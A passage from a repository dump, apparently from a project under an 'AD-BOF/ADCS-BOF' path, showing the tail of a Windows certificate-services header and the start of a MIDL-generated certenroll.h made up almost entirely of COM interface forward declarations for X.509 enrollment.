    _In_opt_ PCWSTR pwszRequestAttributes,
    _In_ PCWSTR pwszServerName,
    _In_ PCWSTR pwszAuthority,
    _Outptr_ CERTSERVERENROLL **ppcsEnroll); // free via CertServerFreeMemory

HRESULT
WINAPI
CertServerRetrievePending(
    _In_ DWORD RequestId,
    _In_opt_ PCWSTR pwszSerialNumber,
    _In_ PCWSTR pwszServerName,
    _In_ PCWSTR pwszAuthority,
    _Outptr_ CERTSERVERENROLL **ppcsEnroll); // free via CertServerFreeMemory

VOID
WINAPI
CertServerFreeMemory(
    _In_ VOID *pv);


enum ENUM_PERIOD
{
    ENUM_PERIOD_INVALID = -1,
    ENUM_PERIOD_SECONDS = 0,
    ENUM_PERIOD_MINUTES,
    ENUM_PERIOD_HOURS,
    ENUM_PERIOD_DAYS,
    ENUM_PERIOD_WEEKS,
    ENUM_PERIOD_MONTHS,
    ENUM_PERIOD_YEARS
};

typedef struct _PERIODUNITS
{
    LONG             lCount;
    enum ENUM_PERIOD enumPeriod;
} PERIODUNITS;


#define TFTP_EXACT		TRUE
#define TFTP_ACCEPTZERO		0x00000002

HRESULT
caTranslateFileTimePeriodToPeriodUnits(
    IN FILETIME const *pftGMT,
    IN BOOL Flags,		// Win7: was BOOL fExact
    OUT DWORD *pcPeriodUnits,
    OUT PERIODUNITS **prgPeriodUnits);

HRESULT
WINAPI
IsRequestConnectionLocal(
    _In_ LPCWSTR pcwszConfig,
    _Out_ BOOL* pfLocal);

BOOL
WINAPI
myNetLogonUser(
    _In_opt_ PCWSTR UserName,
    _In_opt_ PCWSTR DomainName,
    _In_opt_ PCWSTR Password,
    _Out_ PHANDLE phToken);

#ifdef __cplusplus
}
#endif
#endif //__CERTCA_H__


================================================
FILE: AD-BOF/ADCS-BOF/src/request/certenroll.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certenroll_h__
#define __certenroll_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __IObjectId_FWD_DEFINED__
#define __IObjectId_FWD_DEFINED__
typedef interface IObjectId IObjectId;

#endif 	/* __IObjectId_FWD_DEFINED__ */


#ifndef __IObjectIds_FWD_DEFINED__
#define __IObjectIds_FWD_DEFINED__
typedef interface IObjectIds IObjectIds;

#endif 	/* __IObjectIds_FWD_DEFINED__ */


#ifndef __IBinaryConverter_FWD_DEFINED__
#define __IBinaryConverter_FWD_DEFINED__
typedef interface IBinaryConverter IBinaryConverter;

#endif 	/* __IBinaryConverter_FWD_DEFINED__ */


#ifndef __IBinaryConverter2_FWD_DEFINED__
#define __IBinaryConverter2_FWD_DEFINED__
typedef interface IBinaryConverter2 IBinaryConverter2;

#endif 	/* __IBinaryConverter2_FWD_DEFINED__ */


#ifndef __IX500DistinguishedName_FWD_DEFINED__
#define __IX500DistinguishedName_FWD_DEFINED__
typedef interface IX500DistinguishedName IX500DistinguishedName;

#endif 	/* __IX500DistinguishedName_FWD_DEFINED__ */


#ifndef __IX509EnrollmentStatus_FWD_DEFINED__
#define __IX509EnrollmentStatus_FWD_DEFINED__
typedef interface IX509EnrollmentStatus IX509EnrollmentStatus;

#endif 	/* __IX509EnrollmentStatus_FWD_DEFINED__ */


#ifndef __ICspAlgorithm_FWD_DEFINED__
#define __ICspAlgorithm_FWD_DEFINED__
typedef interface ICspAlgorithm ICspAlgorithm;

#endif 	/* __ICspAlgorithm_FWD_DEFINED__ */


#ifndef __ICspAlgorithms_FWD_DEFINED__
#define __ICspAlgorithms_FWD_DEFINED__
typedef interface ICspAlgorithms ICspAlgorithms;

#endif 	/* __ICspAlgorithms_FWD_DEFINED__ */


#ifndef __ICspInformation_FWD_DEFINED__
#define __ICspInformation_FWD_DEFINED__
typedef interface ICspInformation ICspInformation;

#endif 	/* __ICspInformation_FWD_DEFINED__ */


#ifndef __ICspInformations_FWD_DEFINED__
#define __ICspInformations_FWD_DEFINED__
typedef interface ICspInformations ICspInformations;

#endif 	/* __ICspInformations_FWD_DEFINED__ */


#ifndef __ICspStatus_FWD_DEFINED__
#define __ICspStatus_FWD_DEFINED__
typedef interface ICspStatus ICspStatus;

#endif 	/* __ICspStatus_FWD_DEFINED__ */


#ifndef __ICspStatuses_FWD_DEFINED__
#define __ICspStatuses_FWD_DEFINED__
typedef interface ICspStatuses ICspStatuses;

#endif 	/* __ICspStatuses_FWD_DEFINED__ */


#ifndef __IX509PublicKey_FWD_DEFINED__
#define __IX509PublicKey_FWD_DEFINED__
typedef interface IX509PublicKey IX509PublicKey;

#endif 	/* __IX509PublicKey_FWD_DEFINED__ */


#ifndef __IX509PrivateKey_FWD_DEFINED__
#define __IX509PrivateKey_FWD_DEFINED__
typedef interface IX509PrivateKey IX509PrivateKey;

#endif 	/* __IX509PrivateKey_FWD_DEFINED__ */


#ifndef __IX509PrivateKey2_FWD_DEFINED__
#define __IX509PrivateKey2_FWD_DEFINED__
typedef interface IX509PrivateKey2 IX509PrivateKey2;

#endif 	/* __IX509PrivateKey2_FWD_DEFINED__ */


#ifndef __IX509EndorsementKey_FWD_DEFINED__
#define __IX509EndorsementKey_FWD_DEFINED__
typedef interface IX509EndorsementKey IX509EndorsementKey;

#endif 	/* __IX509EndorsementKey_FWD_DEFINED__ */


#ifndef __IX509Extension_FWD_DEFINED__
#define __IX509Extension_FWD_DEFINED__
typedef interface IX509Extension IX509Extension;

#endif 	/* __IX509Extension_FWD_DEFINED__ */


#ifndef __IX509Extensions_FWD_DEFINED__
#define __IX509Extensions_FWD_DEFINED__
typedef interface IX509Extensions IX509Extensions;

#endif 	/* __IX509Extensions_FWD_DEFINED__ */


#ifndef __IX509ExtensionKeyUsage_FWD_DEFINED__
#define __IX509ExtensionKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionKeyUsage IX509ExtensionKeyUsage;

#endif 	/* __IX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionEnhancedKeyUsage IX509ExtensionEnhancedKeyUsage;

#endif 	/* __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_FWD_DEFINED__
#define __IX509ExtensionTemplateName_FWD_DEFINED__
typedef interface IX509ExtensionTemplateName IX509ExtensionTemplateName;

#endif 	/* __IX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplate_FWD_DEFINED__
#define __IX509ExtensionTemplate_FWD_DEFINED__
typedef interface IX509ExtensionTemplate IX509ExtensionTemplate;

#endif 	/* __IX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __IAlternativeName_FWD_DEFINED__
#define __IAlternativeName_FWD_DEFINED__
typedef interface IAlternativeName IAlternativeName;

#endif 	/* __IAlternativeName_FWD_DEFINED__ */


#ifndef __IAlternativeNames_FWD_DEFINED__
#define __IAlternativeNames_FWD_DEFINED__
typedef interface IAlternativeNames IAlternativeNames;

#endif 	/* __IAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_FWD_DEFINED__
#define __IX509ExtensionAlternativeNames_FWD_DEFINED__
typedef interface IX509ExtensionAlternativeNames IX509ExtensionAlternativeNames;

#endif 	/* __IX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_FWD_DEFINED__
#define __IX509ExtensionBasicConstraints_FWD_DEFINED__
typedef interface IX509ExtensionBasicConstraints IX509ExtensionBasicConstraints;

#endif 	/* __IX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
typedef interface IX509ExtensionSubjectKeyIdentifier IX509ExtensionSubjectKeyIdentifier;

#endif 	/* __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
typedef interface IX509ExtensionAuthorityKeyIdentifier IX509ExtensionAuthorityKeyIdentifier;

#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __ISmimeCapability_FWD_DEFINED__
#define __ISmimeCapability_FWD_DEFINED__
typedef interface ISmimeCapability ISmimeCapability;

#endif 	/* __ISmimeCapability_FWD_DEFINED__ */


#ifndef __ISmimeCapabilities_FWD_DEFINED__
#define __ISmimeCapabilities_FWD_DEFINED__
typedef interface ISmimeCapabilities ISmimeCapabilities;

#endif 	/* __ISmimeCapabilities_FWD_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
typedef interface IX509ExtensionSmimeCapabilities IX509ExtensionSmimeCapabilities;

#endif 	/* __IX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __IPolicyQualifier_FWD_DEFINED__
#define __IPolicyQualifier_FWD_DEFINED__
typedef interface IPolicyQualifier IPolicyQualifier;

#endif 	/* __IPolicyQualifier_FWD_DEFINED__ */


#ifndef __IPolicyQualifiers_FWD_DEFINED__
#define __IPolicyQualifiers_FWD_DEFINED__
typedef interface IPolicyQualifiers IPolicyQualifiers;

#endif 	/* __IPolicyQualifiers_FWD_DEFINED__ */


#ifndef __ICertificatePolicy_FWD_DEFINED__
#define __ICertificatePolicy_FWD_DEFINED__
typedef interface ICertificatePolicy ICertificatePolicy;

#endif 	/* __ICertificatePolicy_FWD_DEFINED__ */


#ifndef __ICertificatePolicies_FWD_DEFINED__
#define __ICertificatePolicies_FWD_DEFINED__
typedef interface ICertificatePolicies ICertificatePolicies;

#endif 	/* __ICertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __IX509ExtensionCertificatePolicies_FWD_DEFINED__
typedef interface IX509ExtensionCertificatePolicies IX509ExtensionCertificatePolicies;

#endif 	/* __IX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
typedef interface IX509ExtensionMSApplicationPolicies IX509ExtensionMSApplicationPolicies;

#endif 	/* __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __IX509Attribute_FWD_DEFINED__
#define __IX509Attribute_FWD_DEFINED__
typedef interface IX509Attribute IX509Attribute;

#endif 	/* __IX509Attribute_FWD_DEFINED__ */


#ifndef __IX509Attributes_FWD_DEFINED__
#define __IX509Attributes_FWD_DEFINED__
typedef interface IX509Attributes IX509Attributes;

#endif 	/* __IX509Attributes_FWD_DEFINED__ */


#ifndef __IX509AttributeExtensions_FWD_DEFINED__
#define __IX509AttributeExtensions_FWD_DEFINED__
typedef interface IX509AttributeExtensions IX509AttributeExtensions;

#endif 	/* __IX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __IX509AttributeClientId_FWD_DEFINED__
#define __IX509AttributeClientId_FWD_DEFINED__
typedef interface IX509AttributeClientId IX509AttributeClientId;

#endif 	/* __IX509AttributeClientId_FWD_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_FWD_DEFINED__
#define __IX509AttributeRenewalCertificate_FWD_DEFINED__
typedef interface IX509AttributeRenewalCertificate IX509AttributeRenewalCertificate;

#endif 	/* __IX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_FWD_DEFINED__
#define __IX509AttributeArchiveKey_FWD_DEFINED__
typedef interface IX509AttributeArchiveKey IX509AttributeArchiveKey;

#endif 	/* __IX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __IX509AttributeArchiveKeyHash_FWD_DEFINED__
typedef interface IX509AttributeArchiveKeyHash IX509AttributeArchiveKeyHash;

#endif 	/* __IX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __IX509AttributeOSVersion_FWD_DEFINED__
#define __IX509AttributeOSVersion_FWD_DEFINED__
typedef interface IX509AttributeOSVersion IX509AttributeOSVersion;

#endif 	/* __IX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __IX509AttributeCspProvider_FWD_DEFINED__
#define __IX509AttributeCspProvider_FWD_DEFINED__
typedef interface IX509AttributeCspProvider IX509AttributeCspProvider;

#endif 	/* __IX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __ICryptAttribute_FWD_DEFINED__
#define __ICryptAttribute_FWD_DEFINED__
typedef interface ICryptAttribute ICryptAttribute;

#endif 	/* __ICryptAttribute_FWD_DEFINED__ */


#ifndef __ICryptAttributes_FWD_DEFINED__
#define __ICryptAttributes_FWD_DEFINED__
typedef interface ICryptAttributes ICryptAttributes;

#endif 	/* __ICryptAttributes_FWD_DEFINED__ */


#ifndef __ICertProperty_FWD_DEFINED__
#define __ICertProperty_FWD_DEFINED__
typedef interface ICertProperty ICertProperty;

#endif 	/* __ICertProperty_FWD_DEFINED__ */


#ifndef __ICertProperties_FWD_DEFINED__
#define __ICertProperties_FWD_DEFINED__
typedef interface ICertProperties ICertProperties;

#endif 	/* __ICertProperties_FWD_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_FWD_DEFINED__
#define __ICertPropertyFriendlyName_FWD_DEFINED__
typedef interface ICertPropertyFriendlyName ICertPropertyFriendlyName;

#endif 	/* __ICertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __ICertPropertyDescription_FWD_DEFINED__
#define __ICertPropertyDescription_FWD_DEFINED__
typedef interface ICertPropertyDescription ICertPropertyDescription;

#endif 	/* __ICertPropertyDescription_FWD_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_FWD_DEFINED__
#define __ICertPropertyAutoEnroll_FWD_DEFINED__
typedef interface ICertPropertyAutoEnroll ICertPropertyAutoEnroll;

#endif 	/* __ICertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_FWD_DEFINED__
#define __ICertPropertyRequestOriginator_FWD_DEFINED__
typedef interface ICertPropertyRequestOriginator ICertPropertyRequestOriginator;

#endif 	/* __ICertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_FWD_DEFINED__
#define __ICertPropertySHA1Hash_FWD_DEFINED__
typedef interface ICertPropertySHA1Hash ICertPropertySHA1Hash;

#endif 	/* __ICertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_FWD_DEFINED__
#define __ICertPropertyKeyProvInfo_FWD_DEFINED__
typedef interface ICertPropertyKeyProvInfo ICertPropertyKeyProvInfo;

#endif 	/* __ICertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __ICertPropertyArchived_FWD_DEFINED__
#define __ICertPropertyArchived_FWD_DEFINED__
typedef interface ICertPropertyArchived ICertPropertyArchived;

#endif 	/* __ICertPropertyArchived_FWD_DEFINED__ */


#ifndef __ICertPropertyBackedUp_FWD_DEFINED__
#define __ICertPropertyBackedUp_FWD_DEFINED__
typedef interface ICertPropertyBackedUp ICertPropertyBackedUp;

#endif 	/* __ICertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollment_FWD_DEFINED__
#define __ICertPropertyEnrollment_FWD_DEFINED__
typedef interface ICertPropertyEnrollment ICertPropertyEnrollment;

#endif 	/* __ICertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __ICertPropertyRenewal_FWD_DEFINED__
#define __ICertPropertyRenewal_FWD_DEFINED__
typedef interface ICertPropertyRenewal ICertPropertyRenewal;

#endif 	/* __ICertPropertyRenewal_FWD_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_FWD_DEFINED__
#define __ICertPropertyArchivedKeyHash_FWD_DEFINED__
typedef interface ICertPropertyArchivedKeyHash ICertPropertyArchivedKeyHash;

#endif 	/* __ICertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
typedef interface ICertPropertyEnrollmentPolicyServer ICertPropertyEnrollmentPolicyServer;

#endif 	/* __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509SignatureInformation_FWD_DEFINED__
#define __IX509SignatureInformation_FWD_DEFINED__
typedef interface IX509SignatureInformation IX509SignatureInformation;

#endif 	/* __IX509SignatureInformation_FWD_DEFINED__ */


#ifndef __ISignerCertificate_FWD_DEFINED__
#define __ISignerCertificate_FWD_DEFINED__
typedef interface ISignerCertificate ISignerCertificate;

#endif 	/* __ISignerCertificate_FWD_DEFINED__ */


#ifndef __ISignerCertificates_FWD_DEFINED__
#define __ISignerCertificates_FWD_DEFINED__
typedef interface ISignerCertificates ISignerCertificates;

#endif 	/* __ISignerCertificates_FWD_DEFINED__ */


#ifndef __IX509NameValuePair_FWD_DEFINED__
#define __IX509NameValuePair_FWD_DEFINED__
typedef interface IX509NameValuePair IX509NameValuePair;

#endif 	/* __IX509NameValuePair_FWD_DEFINED__ */


#ifndef __IX509NameValuePairs_FWD_DEFINED__
#define __IX509NameValuePairs_FWD_DEFINED__
typedef interface IX509NameValuePairs IX509NameValuePairs;

#endif 	/* __IX509NameValuePairs_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplate_FWD_DEFINED__
#define __IX509CertificateTemplate_FWD_DEFINED__
typedef interface IX509CertificateTemplate IX509CertificateTemplate;

#endif 	/* __IX509CertificateTemplate_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplates_FWD_DEFINED__
#define __IX509CertificateTemplates_FWD_DEFINED__
typedef interface IX509CertificateTemplates IX509CertificateTemplates;

#endif 	/* __IX509CertificateTemplates_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplateWritable_FWD_DEFINED__
#define __IX509CertificateTemplateWritable_FWD_DEFINED__
typedef interface IX509CertificateTemplateWritable IX509CertificateTemplateWritable;

#endif 	/* __IX509CertificateTemplateWritable_FWD_DEFINED__ */


#ifndef __ICertificationAuthority_FWD_DEFINED__
#define __ICertificationAuthority_FWD_DEFINED__
typedef interface ICertificationAuthority ICertificationAuthority;

#endif 	/* __ICertificationAuthority_FWD_DEFINED__ */


#ifndef __ICertificationAuthorities_FWD_DEFINED__
#define __ICertificationAuthorities_FWD_DEFINED__
typedef interface ICertificationAuthorities ICertificationAuthorities;

#endif 	/* __ICertificationAuthorities_FWD_DEFINED__ */


#ifndef __IX509EnrollmentPolicyServer_FWD_DEFINED__
#define __IX509EnrollmentPolicyServer_FWD_DEFINED__
typedef interface IX509EnrollmentPolicyServer IX509EnrollmentPolicyServer;

#endif 	/* __IX509EnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509PolicyServerUrl_FWD_DEFINED__
#define __IX509PolicyServerUrl_FWD_DEFINED__
typedef interface IX509PolicyServerUrl IX509PolicyServerUrl;

#endif 	/* __IX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __IX509PolicyServerListManager_FWD_DEFINED__
#define __IX509PolicyServerListManager_FWD_DEFINED__
typedef interface IX509PolicyServerListManager IX509PolicyServerListManager;

#endif 	/* __IX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __IX509CertificateRequest_FWD_DEFINED__
#define __IX509CertificateRequest_FWD_DEFINED__
typedef interface IX509CertificateRequest IX509CertificateRequest;

#endif 	/* __IX509CertificateRequest_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10 IX509CertificateRequestPkcs10;

#endif 	/* __IX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V2 IX509CertificateRequestPkcs10V2;

#endif 	/* __IX509CertificateRequestPkcs10V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V3_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V3_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V3 IX509CertificateRequestPkcs10V3;

#endif 	/* __IX509CertificateRequestPkcs10V3_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V4_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V4_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V4 IX509CertificateRequestPkcs10V4;

#endif 	/* __IX509CertificateRequestPkcs10V4_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_FWD_DEFINED__
#define __IX509CertificateRequestCertificate_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate IX509CertificateRequestCertificate;

#endif 	/* __IX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_FWD_DEFINED__
#define __IX509CertificateRequestCertificate2_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate2 IX509CertificateRequestCertificate2;

#endif 	/* __IX509CertificateRequestCertificate2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7 IX509CertificateRequestPkcs7;

#endif 	/* __IX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7V2 IX509CertificateRequestPkcs7V2;

#endif 	/* __IX509CertificateRequestPkcs7V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_FWD_DEFINED__
#define __IX509CertificateRequestCmc_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc IX509CertificateRequestCmc;

#endif 	/* __IX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_FWD_DEFINED__
#define __IX509CertificateRequestCmc2_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc2 IX509CertificateRequestCmc2;

#endif 	/* __IX509CertificateRequestCmc2_FWD_DEFINED__ */


#ifndef __IX509Enrollment_FWD_DEFINED__
#define __IX509Enrollment_FWD_DEFINED__
typedef interface IX509Enrollment IX509Enrollment;

#endif 	/* __IX509Enrollment_FWD_DEFINED__ */


#ifndef __IX509Enrollment2_FWD_DEFINED__
#define __IX509Enrollment2_FWD_DEFINED__
typedef interface IX509Enrollment2 IX509Enrollment2;

#endif 	/* __IX509Enrollment2_FWD_DEFINED__ */


#ifndef __IX509EnrollmentHelper_FWD_DEFINED__
#define __IX509EnrollmentHelper_FWD_DEFINED__
typedef interface IX509EnrollmentHelper IX509EnrollmentHelper;

#endif 	/* __IX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __IX509EnrollmentWebClassFactory_FWD_DEFINED__
typedef interface IX509EnrollmentWebClassFactory IX509EnrollmentWebClassFactory;

#endif 	/* __IX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_FWD_DEFINED__
#define __IX509MachineEnrollmentFactory_FWD_DEFINED__
typedef interface IX509MachineEnrollmentFactory IX509MachineEnrollmentFactory;

#endif 	/* __IX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntry_FWD_DEFINED__
#define __IX509CertificateRevocationListEntry_FWD_DEFINED__
typedef interface IX509CertificateRevocationListEntry IX509CertificateRevocationListEntry;

#endif 	/* __IX509CertificateRevocationListEntry_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntries_FWD_DEFINED__
#define __IX509CertificateRevocationListEntries_FWD_DEFINED__
typedef interface IX509CertificateRevocationListEntries IX509CertificateRevocationListEntries;

#endif 	/* __IX509CertificateRevocationListEntries_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationList_FWD_DEFINED__
#define __IX509CertificateRevocationList_FWD_DEFINED__
typedef interface IX509CertificateRevocationList IX509CertificateRevocationList;

#endif 	/* __IX509CertificateRevocationList_FWD_DEFINED__ */


#ifndef __ICertificateAttestationChallenge_FWD_DEFINED__
#define __ICertificateAttestationChallenge_FWD_DEFINED__
typedef interface ICertificateAttestationChallenge ICertificateAttestationChallenge;

#endif 	/* __ICertificateAttestationChallenge_FWD_DEFINED__ */


#ifndef __ICertificateAttestationChallenge2_FWD_DEFINED__
#define __ICertificateAttestationChallenge2_FWD_DEFINED__
typedef interface ICertificateAttestationChallenge2 ICertificateAttestationChallenge2;

#endif 	/* __ICertificateAttestationChallenge2_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollment_FWD_DEFINED__
#define __IX509SCEPEnrollment_FWD_DEFINED__
typedef interface IX509SCEPEnrollment IX509SCEPEnrollment;

#endif 	/* __IX509SCEPEnrollment_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollment2_FWD_DEFINED__
#define __IX509SCEPEnrollment2_FWD_DEFINED__
typedef interface IX509SCEPEnrollment2 IX509SCEPEnrollment2;

#endif 	/* __IX509SCEPEnrollment2_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollmentHelper_FWD_DEFINED__
#define __IX509SCEPEnrollmentHelper_FWD_DEFINED__
typedef interface IX509SCEPEnrollmentHelper IX509SCEPEnrollmentHelper;

#endif 	/* __IX509SCEPEnrollmentHelper_FWD_DEFINED__ */


#ifndef __CObjectId_FWD_DEFINED__
#define __CObjectId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectId CObjectId;
#else
typedef struct CObjectId CObjectId;
#endif /* __cplusplus */

#endif 	/* __CObjectId_FWD_DEFINED__ */


#ifndef __CObjectIds_FWD_DEFINED__
#define __CObjectIds_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectIds CObjectIds;
#else
typedef struct CObjectIds CObjectIds;
#endif /* __cplusplus */

#endif 	/* __CObjectIds_FWD_DEFINED__ */


#ifndef __CBinaryConverter_FWD_DEFINED__
#define __CBinaryConverter_FWD_DEFINED__

#ifdef __cplusplus
typedef class CBinaryConverter CBinaryConverter;
#else
typedef struct CBinaryConverter CBinaryConverter;
#endif /* __cplusplus */

#endif 	/* __CBinaryConverter_FWD_DEFINED__ */


#ifndef __CX500DistinguishedName_FWD_DEFINED__
#define __CX500DistinguishedName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX500DistinguishedName CX500DistinguishedName;
#else
typedef struct CX500DistinguishedName CX500DistinguishedName;
#endif /* __cplusplus */

#endif 	/* __CX500DistinguishedName_FWD_DEFINED__ */


#ifndef __CCspInformation_FWD_DEFINED__
#define __CCspInformation_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformation CCspInformation;
#else
typedef struct CCspInformation CCspInformation;
#endif /* __cplusplus */

#endif 	/* __CCspInformation_FWD_DEFINED__ */


#ifndef __CCspInformations_FWD_DEFINED__
#define __CCspInformations_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspInformations CCspInformations;
#else
typedef struct CCspInformations CCspInformations;
#endif /* __cplusplus */

#endif 	/* __CCspInformations_FWD_DEFINED__ */


#ifndef __CCspStatus_FWD_DEFINED__
#define __CCspStatus_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCspStatus CCspStatus;
#else
typedef struct CCspStatus CCspStatus;
#endif /* __cplusplus */

#endif 	/* __CCspStatus_FWD_DEFINED__ */


#ifndef __CX509PublicKey_FWD_DEFINED__
#define __CX509PublicKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PublicKey CX509PublicKey;
#else
typedef struct CX509PublicKey CX509PublicKey;
#endif /* __cplusplus */

#endif 	/* __CX509PublicKey_FWD_DEFINED__ */


#ifndef __CX509PrivateKey_FWD_DEFINED__
#define __CX509PrivateKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PrivateKey CX509PrivateKey;
#else
typedef struct CX509PrivateKey CX509PrivateKey;
#endif /* __cplusplus */

#endif 	/* __CX509PrivateKey_FWD_DEFINED__ */


#ifndef __CX509EndorsementKey_FWD_DEFINED__
#define __CX509EndorsementKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EndorsementKey CX509EndorsementKey;
#else
typedef struct CX509EndorsementKey CX509EndorsementKey;
#endif /* __cplusplus */

#endif 	/* __CX509EndorsementKey_FWD_DEFINED__ */


#ifndef __CX509Extension_FWD_DEFINED__
#define __CX509Extension_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Extension CX509Extension;
#else
typedef struct CX509Extension CX509Extension;
#endif /* __cplusplus */

#endif 	/* __CX509Extension_FWD_DEFINED__ */


#ifndef __CX509Extensions_FWD_DEFINED__
#define __CX509Extensions_FWD_DEFINED__

#ifdef __cplusplus
